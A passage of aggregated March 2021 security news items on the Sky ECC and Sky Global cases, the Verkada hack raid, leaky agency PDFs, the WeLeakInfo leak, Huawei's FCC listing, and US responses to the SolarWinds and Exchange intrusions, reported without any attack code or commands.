“The indictment alleges that Sky Global generated hundreds of millions of dollars providing a service that allowed criminal networks around the world to hide their international drug trafficking activity from law enforcement,” said Acting U.S. Attorney Randy Grossman. “Companies who do this are perpetuating the deadliest drug epidemic in our nation’s history. This groundbreaking investigation should send a serious message to companies who think they can aid criminals in their unlawful activities. I want to thank the prosecutors on this case, Meghan Heesch and Joshua Mellor, as well as our federal law enforcement partners at the FBI, DEA, IRS and the U.S. Marshals Service, for their excellent work on this case.”
Swiss Police Raid Over Hack on U.S. Security-Camera Company
16.3.2021 BigBrothers Securityweek
Swiss authorities on Monday confirmed a police raid at the home of a Swiss software engineer who took credit for helping to break into a U.S. security-camera company’s online networks, part of what the activist hacker cited as an effort to raise awareness about the dangers of mass surveillance.
The Federal Office of Justice said regional police in central Lucerne, acting on a legal assistance request from U.S. authorities, on Friday carried out a house search involving hacker Tillie Kottmann.
The hacker said online that electronics devices were seized during the raid. The Swiss office declined to specify the location or comment further, deferring all questions to “the relevant U.S. authority.”
The FBI said in a statement Friday it was “aware of the law enforcement activity conducted in Switzerland” but had no further comment.
Kottmann had identified as a member of a group of “hacktivists” who say they were able to view live camera feeds and peer into hospitals, schools, factories, jails and corporate offices for much of Monday and Tuesday last week after gaining access to the systems of California startup Verkada. They said the action was aimed at raising awareness about mass surveillance.
Verkada later locked them out by disabling all internal administrator accounts that the hackers had accessed using valid credentials found online. The company alerted law enforcement and its customers.
Kottmann, who uses they/them pronouns, said on the social media site Mastodon last week that the raid wasn’t specifically about the Verkada hack but was tied to an earlier FBI investigation. Kottmann has previously attracted attention for leaking hacked material to expose security flaws, including from U.S. chipmaker Intel last year.
It’s common for professional cybersecurity researchers to probe online systems for security flaws, though “hacktivists” often take that a step further by publicly exposing security risks or leaked materials to effect social change.
Kottmann didn’t immediately return requests for comment.
Verkada, based in San Mateo, California, has pitched its cloud-based surveillance service as part of the next generation of workplace security. Its software detects when people are in the camera’s view, and a “Person History” feature enables customers to recognize and track individual faces and other attributes, such as clothing color and likely gender. Not all customers use the facial recognition feature.
Research: Security Agencies Expose Information via Improperly Sanitized PDFs
16.3.2021 BigBrothers Securityweek
Most security agencies fail to properly sanitize Portable Document Format (PDF) files before publishing them, thus exposing potentially sensitive information and opening the door for attacks, researchers have discovered.
An analysis of roughly 40,000 PDFs published by 75 security agencies in 47 countries has revealed that these files can be used to identify employees who use outdated software, according to Supriya Adhatarao and Cédric Lauradoux, two researchers with the University Grenoble Alpes and France’s National Institute for Research in Computer Science and Automation (Inria).
The analysis also revealed that the adoption of sanitization within security agencies is rather low, as only 7 of them used it to remove hidden sensitive information from some of their published PDF files. What’s more, 65% of the sanitized files still contained hidden data.
“Some agencies are using weak sanitization techniques: it requires to remove all the hidden sensitive information from the file and not just to remove the data at the surface. Security agencies need to change their sanitization methods,” the academic researchers say.
PDF files, the researchers note, represent collections of indirect objects (eight types of objects: arrays, boolean, dictionaries, names, numbers, streams, strings, and the null object) that are used to store data. These objects may include hidden data not visible when viewing the PDF.
Per the NSA, there are 11 main types of hidden data in PDF files, namely metadata; embedded content and attached files; scripts; hidden layers; embedded search index; stored interactive form data; reviewing and commenting; hidden page, image and update data; obscured text and images; PDF comments that are not displayed; and unreferenced data.
Metadata associated with images within a PDF file can be used to gather information about the author, the same as comments and annotations that haven’t been removed before publishing, and PDF metadata.
There are several tools that can be used for sanitizing PDF files, including Adobe’s Acrobat, and there are four levels of sanitization: Level-0: full metadata (no sanitization), Level-1: partial metadata, Level-2: no metadata, and Level-3: properly cleaned files (full sanitization, with all objects having been removed).
For their research, the academics used a set of 39,664 PDF files. Of these, 1,783 (4%) were found to include author name, 30,155 (76%) contained metadata on the PDF producer tool, and 16,805 (42%) revealed the operating system used.
The files also leaked email addresses – including official ones – (in 52 files), hardware brand (581 files), and paths (1,814 PDFs).
“During our analysis we observed that many agencies include more than one author publishing the PDF files. It is possible to download all the PDF files published on a security agency’s website and observe the author habits, OS trends,” the researchers note.
The analysis also allowed for the identification of 159 employees at 19 agencies that haven’t updated tools over a period of two years, which could be abused by threat actors in targeted attacks, especially since nearly half of the PDF files leaked operating system data.
While 9,509 (24%) of the analyzed PDF files have been sanitized before publishing, only 3,313 (8%) were sanitized with Level-3. The researchers note that only 3 agencies out of 7 that appear to care about sanitization are doing it properly.
“The issue is that popular PDF producer tools are keeping metadata by default with many other information while creating a PDF file. They provide no option for sanitization or it can only be achieved by following a complex procedure. Software producing PDF files need to enforce sanitization by default. The user should be able to add metadata only as an option,” the academics conclude.
US Indicts Head of Alleged Crime Chat Comms Service
15.3.2021 BigBrothers Securityweek
The CEO of a Canada-based company that provides encrypted communications and a former associate have been indicted in the US on charges of facilitating international drug trafficking, the Justice Department said.
The indictments were presented Friday against Jean-Francois Eap, the head of Sky Global, and Thomas Herdman, a former high-level distributor of Sky Global devices, the department said Friday.
Warrants have been issued for the arrest of the two men.
"The indictment alleges that Sky Global generated hundreds of millions of dollars providing a service that allowed criminal networks around the world to hide their international drug trafficking activity from law enforcement," said Acting US Attorney Randy Grossman.
"Sky Global’s devices are specifically designed to prevent law enforcement from actively monitoring the communications between members of transnational criminal organizations involved in drug trafficking and money laundering," the indictment alleges.
It said there are at least 70,000 Sky Global devices in use around the world.
The indictment comes after police in Europe said Wednesday they had arrested at least 80 people and carried out hundreds of raids in two countries after shutting down the Sky ECC encrypted phone network -- Sky Global's actual product -- used by organized crime groups.
Belgian, Dutch and French police said they hacked into the Sky ECC network, allowing them to look "over the shoulders" of suspects as they communicated with customized devices to plot drug deals and murders.
In France, law officials identified some 2,000 users of Sky ECC "allowing for procedures to be opened relating to large-scale drug operations and attacks on people," the Paris prosecutor said.
"The network we are dealing with seems to be almost exclusively used by large-scale criminals."
Despite Hacks, US Not Seeking Widened Domestic Surveillance
15.3.2021 BigBrothers Securityweek
The Biden administration is not planning to step up government surveillance of the U.S. internet even as state-backed foreign hackers and cybercriminals increasingly use it to evade detection, a senior administration official said Friday.
The official said the administration, mindful of the privacy and civil liberties implications that could arise, is not currently seeking additional authority to monitor U.S.-based networks. Instead, the administration will focus on tighter partnerships and improved information-sharing with the private-sector companies that already have broad visibility into the domestic internet, said the official, who spoke to reporters on condition of anonymity.
The comment was an acknowledgement of the fraught political debate surrounding domestic government surveillance — nearly eight years after former National Security Agency contractor Edward Snowden triggered a scandal with leaked agency documents — and a recognition of the challenges in balancing the growing cyber defense imperative against privacy concerns that come with stepped-up monitoring.
Foreign state hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by U.S. intelligence agencies, who are legally constrained from monitoring domestic infrastructure.
In the crucial second stage of the SolarWinds hacking campaign, for instance, the suspected Russian intelligence operatives used U.S.-based VPNs to siphon off data through backdoors in victims’ networks, establishing an account that made it seem like they were in the U.S.
That hack detected in December compromised at least nine federal agencies, and exposed “significant gaps in modernization and in technology of cybersecurity across the federal government,” the official said. Dozens of private-sector companies were also hit, the telecommunications and software sector most heavily.
The U.S. is also addressing a separate, far more widespread and indiscriminate hack that cyber sleuths blame on China and which became a global crisis last week.
It has exposed tens of thousands of servers running Microsoft’s Exchange email program to intrusion. Though Microsoft has patched the vulnerability, affected server owners had only a “short window” to get vulnerable servers fixed, the official said. Criminal and state-backed hackers seeking to exploit the underlying flaw are apt to cause more havoc, the administration says.
The official said President Joe Biden has been briefed on the incident, and private-sector cybersecurity sleuths were brought in to confer with White House officials on a response.
When it comes to the pursuit of new surveillance or monitoring authorities, the official described the administration’s posture as “not yet, not now.” The official said the administration is committed at the moment to improving the flow of information with cloud providers and private companies who have good visibility into U.S. networks but aren’t bound by the same government constraints.
Predictions from the cybersecurity community were proving correct, meanwhile, that ransomware attacks leveraging compromised Exchange servers would be inevitable given the scope of the hack.
Microsoft said it has detected a new family of ransomware, dubbed DearCry, exploiting the compromises. Ransomware expert Brett Callow of the cybersecurity firm Emsisoft said the website ID Ransomware had so far received six submissions of the malware — from victims in the United States, Australia, Austria, Canada and Denmark.
Microsoft said in a tweet that it was blocking the ransomware, but, said Callow, “That’ll not necessary stop attacks.” Antivirus products detect and block a lot of known ransomware — but hackers often disable those products prior to deployment, he said.
The global ransomware scourge — primarily the work of Russian-speaking and North Korean cybercriminals — has cost businesses, local governments, health care providers and even K-12 school districts tens of billions of dollars in the past few years.
Europol Credits Sweeping Arrests to Cracked Sky ECC Comms
13.3.2021 BigBrothers Threatpost
Sky ECC claims that cops cracked a fake version of the app being passed off by disgruntled reseller.
Europol launched “major interventions” against organized crime on March 9, which it said were made possible by monitoring the encrypted messages of around 70,000 users of the Sky ECC service since mid-February.
Sky ECC, which focuses on selling mobile phones with specialized, private communications, denies that the messages on its platform were decrypted. However, sweeping arrests across Belgium, France and the Netherlands reported by Europol, in coordination with those countries’ law-enforcement authorities, seem to indicate otherwise. And Europol said it’s not done with the collected data, which it hopes will lead to additional actions and prosecutions.
Europol said Sky ECC has about 170,000 users who send around 3 million messages every day, adding that 20 percent of those users are in Belgium and the Netherlands.
“By successfully unlocking the encryption of Sky ECC, the information acquired will provide insights into criminal activities in various E.U. Member States and beyond, and will assist in expanding investigations and solving serious and cross-border organized crime for the coming months, possibly years,” Europol said in its announcement.
This latest operation follows the EncroChat bust from last July, when the U.K.’s National Crime Agency seized the service’s servers and broke up organized-crime activities being conducted across encrypted messages — including money laundering, where to hide drugs and even murder. More than 700 arrests were made in that bust, and the remaining customers moved over to Sky ECC, Europol said.
This month’s crackdown began in Belgium, Europol explained, when police seized devices from suspects who were found to be using Sky ECC to organize and communicate.
In Belgium alone, the operations involved more than 1,600 Belgian police officers, some escorted by special forces, and raids on 200 individual residences.
Dutch police reported that they conducted 75 home raids, arrested 30 suspects and seized millions in cash, eight cars, weapons, cash machines and police uniforms.
A statement from Dutch law enforcement from March 9 said the operation it called “Argus” included the seizure of Sky ECC servers.
Sky ECC Denies Messages Were Decrypted
Sky ECC refutes that messages were breached, posting a notice on its homepage saying, “Dutch police confirms that they are investigating a fake Sky ECC phone,” the company said. “This phone was developed by someone who has been passing themselves off as an official reseller for some years.”
What Sky ECC said is an imposter phone.
The reseller is called SKYECC.EU, and Sky ECC provided photos of the phone seized by Dutch authorities, for comparison to an authentic Sky ECC phone.
“This ‘E.U.’ phone is not one of ours and is not sold by us,” says Jean-François Eap, CEO of Sky ECC. “We know that someone has been passing themselves off as an official reseller of Sky ECC for some time, and we have been trying to shut it down through legal channels for almost two years.”
Europol and Sky ECC have not responded to Threatpost’s requests for additional comment.
A real Sky ECC device.
Sky ECC advertises that it is so confident in its security that it offers a $5 million prize for anyone who can break in. It also denied that any of the law enforcement agencies behind this recent roundup have asked for the payout.
“The Belgian police’s claim that they sent bank-accounts details to Sky ECC to claim our ‘5 Million Dollar Hack’ prize is entirely false,” Eap added.
“Sky ECC has not been contacted by any authorities in connection with any investigations currently being reported,” Eap said. “The confusing references to Sky ECC instead of SKYECC.EU are very damaging. If authorities have based any assessment of Sky ECC on account of SKYECC.EU, they are severely mistaken about the nature of Sky ECC and its operations.”
Eap added the company is actively working on the problem.
“We are gathering as much information as quickly as we can in order to provide accurate information to the public, the media, and the authorities alike,” he explained. “We hope that by remaining clear and transparent, we provide a foil to the sensationalist reporting and claims made over the past 2 days.”
Are Private Communications Extinct?
Until more evidence surfaces, Brandon Hoffman, CISO at Netenrich, told Threatpost there’s no way to really know what happened beyond the facts that arrests were made and that Sky ECC is still operational.
“On one hand, it’s hard to believe an organization like Europol would make a false claim or an overblown claim, yet that could be tactic used by them to push criminals into a less secure platform or one they have more hooks into,” Hoffman said. “On the other hand, the operators of Sky ECC would be facing the collapse of their entire business model if they had this issue, and it stands to reason they have done everything in their power to ensure the messaging remains secure.”
The question is, how many Sky ECC customers are willing to gamble on whether Europol is bluffing? Or, will many just move on to another encrypted messaging service, similarly to when they migrated from EncroChat last summer?
Tim Wade, who works at Vectra hunting cyberattackers, told Threatpost that law enforcement’s seizure or intercepting of private communications, for any purpose, should be viewed as a dangerous infringement on basic rights.
“Private communication as essential for free and fair societies,” Wade said. “Sidestepping the validity of the claims about compromising Sky ECC, it’s critical that we recognize that criminals misusing encryption is a price worth paying to promote individual privacy, and enjoy the benefits that such privacy provides to our culture.”
10,000+ WeLeakInfo customer records leaked
13.3.2021 BigBrothers Securityaffairs
An actor claimed to have registered one of the domains of WeLeakInfo, accessed details of 10000+ WeLeakInfo’ s customers, and leaked it.
WeLeakInfo.com was a data breach notification service that was allowing its customers to verify if their credentials been compromised in data breaches. The service was claiming a database of over 12 billion records from over 10,000 data breaches. In early 2020, a joint operation conducted by the FBI in coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain.
After the seizure of the service in January, two men, one in the Netherlands and another in Northern Ireland, were arrested.
On January 2021, NCA arrested 21 people in the UK as part of an operation targeting customers of WeLeakInfo service that advertised stolen personal credentials.
Data breach notification services is a profitable business, visitors pay a fee to access data exposed in past data breaches. A subscription fee ranges from a $2 trial to a $70 three-month unlimited access account and allows users to search for any data in the archive managed by the companies.
This is quite different from services that only alert individuals when their data are exposed in a data breach and that for this reason are considered legal.
Data breach notification services like WeLeakInfo are a mine for threat actors that could gather information on their targets before launching a cyber attack.
Security experts from Cyble noticed that an member of a hacking forum claimed to have registered one of the domains of WeLeakInfo, wli.design, which was registered again on March 11 2021.
Then the actor created an email address for the domain and used it to access the account of the cybercrime group registered on the payment service Stripe. The access to the Stripe account allowed the actor to access customers’ details, including email, address, partial card details, and purchase history.
“The WeLeakInfo operators allegedly used the domain’s email address for payments via Stripe, the actor claimed. The actor claimed to have registered the domain and then created an email address on the registered domain used in their Stripe account gaining access to WeLeakInfo customers’ details.” reads the post published by Cyble.
“Upon access to WeLeakInfo’s Stripe account, the actor allegedly gained access to their customers’ details (including email, address, partial card details, purchase history and others).”
One of the files leaked by the actor, named “top_customers.csv,” includes a total of 100 personal and “maybe professional” email addresses, while another file includes buyers’ addresses and partial details of their credit cards.
Huawei Listed Anew as Threat to US National Security
13.3.2021 BigBrothers Securityweek
Huawei a National Security Threat
US regulators on Friday listed Huawei among Chinese telecom gear firms deemed a threat to national security, signaling that a hoped for softening of relations is not in the cards.
A roster of communications companies thought to pose "an unacceptable risk" to national security included Huawei Technologies; ZTE; Hytera Communications; Hangzhou Hikvision Digital Technology, and Dahua Technology.
"This list is a big step toward restoring trust in our communications networks," said Federal Communications Commission acting chairwoman Jessica Rosenworcel.
"This list provides meaningful guidance that will ensure that as next-generation networks are built across the country, they do not repeat the mistakes of the past or use equipment or services that will pose a threat to US national security or the security and safety of Americans."
The five Chinese companies that provide communications equipment or services were on a roster compiled by the FCC and the Homeland Security Bureau as per US law.
Huawei chief and founder Ren Zhengfei last month called for a reset with the United States under President Joe Biden, after the firm was battered by sanctions imposed by Donald Trump's administration.
In his first appearance before journalists in a year, Ren Zhengfei said his "confidence in Huawei's ability to survive has grown" despite its travails across much of the western world where it is maligned as a potential security threat.
The comments came as the firm struggled under rules that have effectively banned US firms from selling it technology such as semiconductors and other critical components, citing national security concerns.
Insisting that Huawei remained strong and ready to buy from US companies, Ren called on the Biden White House for a "mutually beneficial" change of tack that could restore its access to the goods.
Continuing to do so, he warned, would hurt US suppliers.
Founded by Ren in 1987, Huawei largely flew under the global radar for decades as it became the world's largest maker of telecoms equipment and a top mobile phone producer.
That changed under former president Donald Trump, who targeted the firm as part of an intensifying China-US trade and technology standoff.
Trump from 2018 imposed escalating sanctions to cut off Huawei's access to components and bar it from the US market, while he also successfully pressured allies to shun the firm's gear in their telecoms systems.
Ren also has had to deal with the December 2018 arrest of his daughter, Huawei executive Meng Wanzhou, on a US warrant during a Vancouver stopover.
Meng, 49, faces fraud and conspiracy charges in the United States over alleged Huawei violations of US sanctions against Iran, and separate charges of theft of trade secrets.
US Moves Closer to Retaliation Over Hacking as Cyber Woes Grow
13.3.2021 BigBrothers Securityweek
A senior US official said Friday the Biden administration is close to a decision on retaliation for state-sponsored hacking as fears grew over the fallout from the latest of two major cyberattacks.
The official said the White House was working closely with the private sector to ramp up cyber defenses following the attacks which targeted Microsoft Exchange servers and SolarWinds security software, potentially compromising thousands of government and private computer networks.
US officials had previously hinted at moves against Russia, which has been linked to the massive SolarWinds hack that shook the government and corporate security last year. The latest comments suggested forthcoming actions.
"You can expect further announcements on that in weeks, not months," the senior official said, in reference to SolarWinds, in a briefing with reporters on the two hacking incidents.
The official, who asked not to be identified, said federal agencies had made progress in patching systems at nine federal agencies affected by the SolarWinds attack.
But an urgent effort is underway to remedy the Microsoft Exchange hack, which opened security holes that are actively being exploited by cybercriminals and others.
To help find solutions, "for the first time we've invited private sector companies to participate" in key national security meetings on the attacks, the official said.
The response "is still evolving," according to the official, who noted: "We really have a short window to get vulnerable servers patched, measured in hours, not days."
- New ransomware emerges -
The comments came as a new strain of ransomware has emerged which exploits a security flaw in Microsoft Exchange servers, signaling potentially damaging consequences from the high-profile hack.
Microsoft and other security researchers said the new ransomware dubbed "DearCry" was showing up in servers affected by the breach attributed to a Chinese hacker group.
"We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers," said a tweet from Microsoft Security Intelligence.
Other researchers including Michael Gillespie, founder of the ID Ransomware service, noted the new strain of malware on Thursday, which could lead to a new wave of attacks that encrypt computer systems and seek to extract payments from operators.
This is the latest sign that the security flaw which became public this month could open the door to a variety of hackers, cybercriminals and cyberespionage operators.
"While patching to prevent compromises will be easy, remediating any systems that have already been compromised will not," said Brett Callow of the security firm Emsisoft.
"At this point, it's absolutely critical that governments quickly come up with a strategy to help organizations secure their Exchange servers and remediate any compromises before an already bad situation becomes even worse."
Earlier this week the FBI and Department of Homeland Security warned that the Exchange server vulnerability may be exploited for nefarious purposes.
A joint statement by the agencies said that "adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack."
The DHS Cybersecurity and Infrastructure Security Agency has been pressing for patches to be applied to networks in both government and the private sector.
The potentially devastating hack is believed to have affected at least 30,000 Microsoft email servers in government and private networks and has prompted calls for a firm response to state-sponsored attacks which could involve "hacking back" or other measures.
Internet disruption in Russia coincided with the introduction of restrictions
13.3.2021 BigBrothers Securityaffairs
Experts at the NetBlocks Internet Observatory observed this week a temporary disruption of internet service in Russia due to new restrictions.
On Wednesday 10 March 2021, researchers from Network data from the NetBlocks Internet Observatory observed the disruption of internet service provided by the Russian operator Rostelecom.
The partial disruption of the service coincided with the announcement of new restrictions by the telecoms watchdog Roskomnadzor.
Multiple operators were impacted by the activity, most impacted were mobile networks.
“The incident comes as Russian internet regulatory body Roskomnadzor announces protective measures to slow, or throttle, access to Twitter services citing an alleged failure by the company to remove harmful content over extended periods of time.” states the report published by Netblocks.
The link between the new restrictions and the disruption of internet services has yet to be demonstrated.
Proposed Bill Would Allow Americans to Sue Foreign Cyber-Actors
11.3.2021 BigBrothers Securityweek
A bill introduced in the House of Representatives this week could allow United States citizens to seek monetary damages if cyber-attacks by foreign threat actors harm them in any way.
Referred to as the Homeland and Cyber Threat Act, or the HACT Act, the legislation is the reintroduced version of a bill initially introduced in August 2019.
The bill was reintroduced by Reps. Jack Bergman (MI-01), Colin Allred (TX-32), Brian Fitzpatrick (PA-01), Jaime Herrera Beutler (WA-03), Joe Neguse (CO-02), and Andy Kim (NJ-03).
Per the bill, Americans would be able to make claims in federal or state courts if they are in any way affected by cyber-attacks that foreign states have conducted against them.
The HACT Act seeks to eliminate the immunity of foreign states, officials, and government employees, in courts in the United States, when Americans seek money damages against a foreign state “for personal injury, harm to reputation, or damage to or loss of property,” the bill reads.
Activities the legislation refers to include unauthorized access to a computer in the United States or to confidential, electronic information stored in the country, as well as the use of malware or other harmful applications to infect computers in the United States.
The bill also seeks to cover the unauthorized use or leak of information stolen from those activities and the provisioning of material support for threat actors who engage in those types of activities, including by officials of foreign states.
“Cyberattacks against American citizens are only increasing and Congress should give Americans the tools they need to fight back against foreign attacks. This legislation does just that by giving Americans the ability to hold foreign governments accountable for damage done by cyberattacks,” Rep. Allred commented.
Latest Mass Hacks Highlight Challenge for Biden Administration
11.3.2021 BigBrothers Securityweek
The potentially devastating hack of Microsoft email servers, the second major cyberattack in months, adds pressure to the Biden administration as it weighs options for "hacking back" or other moves to protect cyberspace.
Security analysts say stronger actions are needed to deter the attacks which exploited vulnerabilities in corporate and government networks and opened opportunities for espionage and cybercrime.
The latest hack exploiting flaws in Microsoft Exchange service is believed to have affected at least 30,000 US organizations including local governments and was attributed to an "unusually aggressive" Chinese cyberespionage campaign.
The news comes on the heels of revelations that Russia was probably behind the massive SolarWinds hack that shook the government and corporate security last year.
"These are two very big incidents and represent a significant litmus test for the early stages of the Biden administration," said Frank Cilluffo, a former homeland security adviser in the George W. Bush administration who is now the director of Auburn University's McCrary Institute for Cyber and Critical Infrastructure Security.
"A response is important because it sets a precedent and sets the tone for the administration's response to unacceptable cyber behavior."
Cilluffo added that any action would not simply respond to the perpetrators, noting that "everyone else is watching, and other state and nonstate actors are going to pay attention to our ability to respond."
James Lewis, a cybersecurity specialist with the Center for Strategic and International Studies, said the two incidents suggest "that our cybersecurity strategy isn't working against our most skilled and dangerous opponents."
"This means that the espionage advantages are endless," Lewis said. "The Biden team understands this and is trying to change things, but we are far from having a solution."
- Hacking back? -
Until recently, the notion of "hacking back" counterstrikes was considered too politically risky under international norms. But a 2019 agreement among 28 countries set a legal framework for such retaliation, Lewis noted.
"Hacking back by private entities is still illegal, but the case has been made that it is legal for a state to do so in response to an attack," he said.
R. David Edelman, a former digital security adviser to the Obama administration who is now on the faculty at the Massachusetts Institute of Technology, said the new administration faces difficult choices
"The administration has said it wants to impose costs -- and it’s unclear what costs are commensurate. Just like with Solar Winds, the private sector is going to have to pay for another state's adventurism," Edelman said.
"Indictments? Sanctions? They only have so much effect when we're talking about agents safely ensconced in a foreign security state thousands of miles away."
- 'Surgical' response -
Microsoft said a state-sponsored hacking group operating out of China is exploiting previously unknown security flaws in its Exchange email services to steal data from business users.
The hacking group, which it has named "Hafnium," is a "highly skilled and sophisticated actor," according to the company.
This comes following revelations that hackers managed to compromise and instal malware on a piece of security software developed by SolarWinds which is used for management and supervision of networks at many large companies and several US government agencies.
The attack was discovered by cybersecurity company FireEye, which, along with SolarWinds, has pointed the finger at hackers linked to the Russian government.
Last month, Anne Neuberger, the senior White House cybersecurity advisor, said her team was looking "holistically" at retaliation.
"This isn't the only case of malicious cyber activity of likely Russian origin, either for us or for our allies and partners," she said.
Cilluffo said any response must be carefully crafted, like any military action, to punish the intended targets without harming innocent bystanders. That could mean economic, diplomatic or military measures, he said.
"This can't be treated as a cyber incident alone," he said. "It has to be woven into the broader geopolitical and national security machinery of the US government."
This could mean different kinds of responses for Russia, China, North Korea or others believed to be supporting hacker activity.
"A computer network attack is clearly an instrument in our toolbox," he said.
"But we want to do it surgically, discriminately and obviously have impact on those we want to have impact on."
SUPERNOVA backdoor that emerged after SolarWinds hack is likely linked to Chinese actors
10.3.2021 BigBrothers Securityaffairs
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks
Supernova malware spotted on compromised SolarWinds Orion installs exposed on the Internets is likely linked to a China-linked espionage group.
Researchers at Secureworks’ counter threat unit (CTU) were investigating the exploit of SolarWinds servers to deploy the Supernova web shell when collected evidence that linked the malicious activity to a China-linked cyber espionage group tracked as Spiral.
The attackers were observed exploiting the CVE-2020-10148 authentication bypass issue in the SolarWinds Orion API to remotely execute API commands.
Once the attackers have exploited the issue on a vulnerable server, they have deployed the Supernova web shell to disk using a PowerShell command.
“In late 2020, Secureworks® Counter Threat Unit™ (CTU) researchers observed a threat actor exploiting an internet-facing SolarWinds server to deploy the SUPERNOVA web shell. Additional analysis revealed similarities to intrusion activity identified on the same network earlier in 2020, suggesting the two intrusions are linked.” reads the analysis published by Secureworks. “CTU™ researchers attribute the intrusions to the SPIRAL threat group. Characteristics of the activity suggest the group is based in China.”
In December, shortly after the initial disclosure of the SolarWinds attack, several teams of researchers mentioned the existence of two second-stage payloads.
Security experts from Symantec, Palo Alto Networks, and Guidepoint reported that threat actors behind the SolarWinds attack were also planting a .NET web shell dubbed Supernova.
Researchers from Palo Alto Networks revealed that the malicious code is a tainted version of the legitimate .NET library “app_web_logoimagehandler.ashx.b6031896.dll” included in the SolarWinds Orion software.
According to SecureWorks, Supernova was used by threat actors for reconnaissance activities, to harvest credentials and exfiltrate data from the compromised systems.
Secureworks experts found similarities with previous intrusion activity, the analysis of an incident earlier in 2020 revealed that the threat actor initially gained access to the target network as early as 2018 by exploiting a vulnerable public-facing ManageEngine ServiceDesk server. The attacker leveraged the access to periodically harvest and exfiltrate domain credentials. In August 2020, the attackers used the same acces to harvest credentials from two servers, then used them to access files from Office 365-hosted SharePoint and OneDrive services.
The attackers used identical commands to dump the LSASS process via comsvcs.dll and used the same output file path, they also accessed the same servers, and used three compromised administrator accounts in both intrusions
“CTU researchers have associated Chinese threat groups with network intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property,” states the analysis. “Although SPIRAL activity shares these characteristics, the characteristics are insufficient for attributing SPIRAL’s country of origin. However, an additional characteristic of the August 2020 intrusion strengthens the Chinese connection.”
Anyway, the above intrusions are not linked to the SolarWinds supply chain attack. It is important to highlight that the intrusion investigated by SecureWorks was not caused by the exploitation of SolarWinds supply chain, but the attackers were able to add Supernova to Orion software
Supernova was not delivered through the SolarWinds updates.
FireEye CEO: Reckless Microsoft Hack Unusual for China
10.3.2021 BigBrothers Securityweek
Cyber sleuths have already blamed China for a hack that exposed tens of thousands of servers running its Exchange email program to potential hacks. The CEO of a prominent cybersecurity firm says it now seems clear China also unleashed an indiscriminate, automated second wave of hacking that opened the way for ransomware and other cyberattacks.
The second wave, which began Feb. 26, is highly uncharacteristic of Beijing’s elite cyber spies and far exceeds the norms of espionage, said Kevin Mandia of FireEye. In its massive scale it diverges radically from the highly targeted nature of the original hack, which was detected in January.
“You never want to see a modern nation like China that has an offense capability — that they usually control with discipline — suddenly hit potentially a hundred thousand systems,” Mandia said Tuesday in an interview with The Associated Press.
Mandia said his company assesses based on the forensics that two groups of Chinese state-backed hackers — in an explosion of automated seeding — installed backdoors known as “web shells” on an as-yet undetermined number of systems. Experts fear a large number could easily be exploited for second-stage infections of ransomware by criminals, who also use automation to identify and infect targets.
Across the globe, cybersecurity teams are scrambling to identify and shore up hacked systems. The National Governors Association sent a rare alert to governors on Tuesday asking them amplify “both the severity of the threat and the next steps” local governments, businesses and operators of critical infrastructure should take.
David Kennedy, CEO of the cybersecurity firm TrustedSec, tweeted Tuesday that resource-demanding programs that “mine” cryptocurrencies were being installed on some compromised Exchange servers.
The White House has called the overall hack an “active threat,” but so far has not urged tough action against China or differentiated between the two waves — at least not publicly. Neither the White House nor the Department of Homeland Security offered immediate comment on whether they attribute the second wave to China.
The assessment of Mandia, who has been dealing with Chinese state-backed hackers since 1995 and has long had the ear of presidents and prime ministers, squares with that of Dmitri Alperovitch, former chief technical officer of CrowdStrike, the other cybersecurity powerhouse in the Washington, D.C., area. Alperovitch says China needs to be immediately put on notice: Shut down those web shell implants and limit collateral.
The explosion of automated backdoor-creating hacks began five days before Microsoft issued a patch for the vulnerabilities first detected in late January by the cybersecurity firm Volexity. It had found evidence of the vulnerabilities being used as far back as Jan. 3 by Chinese state-backed hackers, who researchers say targeted think tanks, universities, defense contractors, law firms and infectious-disease research centers.
Suddenly, all manner of organizations that run email servers were infected with web shells associated with known Chinese groups, who — knowing the patch was imminent — rushed to hit everything they could, said Mandia.
“They could sense it was going to end-of-life soon, so they just went wild. They machine gun-fired down the stretch,” he said in an interview in FireEye’s offices.
It’s possible the second infection wave was not approved at the highest levels of China’s government,” Mandia said.
“This doesn’t feel consistent with what they normally do,” he said. “A lot of times there’s a disconnect between senior leadership and front-line folks. All I can tell you is it was surprising to me to see four ‘zero days’ wantonly exploited,” adding, “If you could be exploited by this act, for the most part, you were.”
“Zero days” are vulnerabilities that hackers discover and use to pry open secret doors in software. Their name derives from the countdown to patching that begins after they are deployed. In this case, it took Microsoft 28 days to produce a patch once it was notified.
Mandia cautioned that the mass hack is not apt to trigger any critical infrastructure failures or cost lives. “It’s not going to draw blood.” But it highlights how there are no rules of engagement in cyberspace, something governments urgently need to address “before something catastrophic happens.”
Asked for comment on Monday about allegations it was behind the hack, the Chinese Embassy in Washington pointed to remarks last week from Foreign Ministry spokesperson Wang Wenbin saying that China “firmly opposes and combats cyber attacks and cyber theft in all forms.” He said attribution of cyberattacks should be based on evidence and not “groundless accusations.”
Mandia compared the Exchange hack with the SolarWinds hacking campaign that Washington has blamed on elite Russian intelligence agents that his company discovered in December.
“The SolarWinds attack was very surreptitious, very stealthy, very focused. The operator showed restraint and they went deep not wide,” said Mandia, who appeared in multiple Capitol Hill hearings on SolarWinds. “This attack (Exchange) feels very wide, but what I don’t have an answer to yet is just how deep it is.”
U.S. officials say at least nine federal agencies and over 100 private sector targets were affected by the SolarWinds campaign, named after the Texas company whose network management software was used to seed malware to more than 18,000 customers. Only a small number were hacked during the campaign, which went eight months without being detected.
Mandia said Russian intelligence operatives had manually penetrated the networks of between 60 and 100 different victims. Security researchers say telecommunications and software companies and think tanks were especially hard hit.
Idaho Man Charged With Hacking Into Computers in Georgia
9.3.2021 BigBrothers Securityweek
An Idaho man faces federal charges after authorities say he hacked into the computers of a Georgia city and Atlanta area medical clinics.
Robert Purbeck — who used online aliases Lifelock and Studmaster — was indicted Tuesday by a federal grand jury in Georgia, according to a news release from the U.S. attorney’s office in Atlanta. He’s charged with computer fraud and abuse, access device fraud and wire fraud.
